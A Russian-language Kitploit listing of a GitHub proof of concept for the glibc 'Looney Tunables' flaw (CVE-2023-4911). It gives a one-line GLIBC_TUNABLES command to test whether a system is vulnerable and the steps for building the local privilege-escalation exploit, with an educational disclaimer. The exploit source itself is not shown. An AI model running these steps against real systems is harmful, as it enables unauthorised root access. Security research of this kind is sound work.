Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/hadrian3689/looney-tunables-cve-2023-4911
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubhadrian3689/looney-tunables-cve-2023-4911

looney-tunables-CVE-2023-4911

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
2962 лет назадПроверено Kitploit

PoC уязвимости CVE-2023-4911 Looney Tunables

Это PoC уязвимости CVE-2023-4911 (также известной как "Looney Tunables"), эксплуатирующей ошибку в функции parse_tunables() динамического загрузчика glibc, которая обрабатывает переменную окружения GLIBC_TUNABLES.

Начало работы

Запуск программы

  • Проверить, уязвима ли цель, можно следующим образом:
root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
  • Если мы получаем Segmentation fault (core dumped), то имеем дело с уязвимой целью.

Запуск программы

  • Создать файл libc.so.6
root@kitploit:~
python3 libc.py
  • Скомпилировать эксплойт
root@kitploit:~
gcc exp.c -o exp

Отказ от ответственности

Весь код, предоставленный в этом репозитории, предназначен исключительно для образовательных/исследовательских целей. Любые действия и/или мероприятия, связанные с материалом, содержащимся в этом репозитории, осуществляются исключительно на ваш страх и риск. Неправильное использование кода из этого репозитория может привести к уголовному преследованию лиц, причастных к этому. Автор не несет ответственности в случае возбуждения уголовного дела против лиц, неправильно использующих код из этого репозитория для нарушения закона.

Скачать инструмент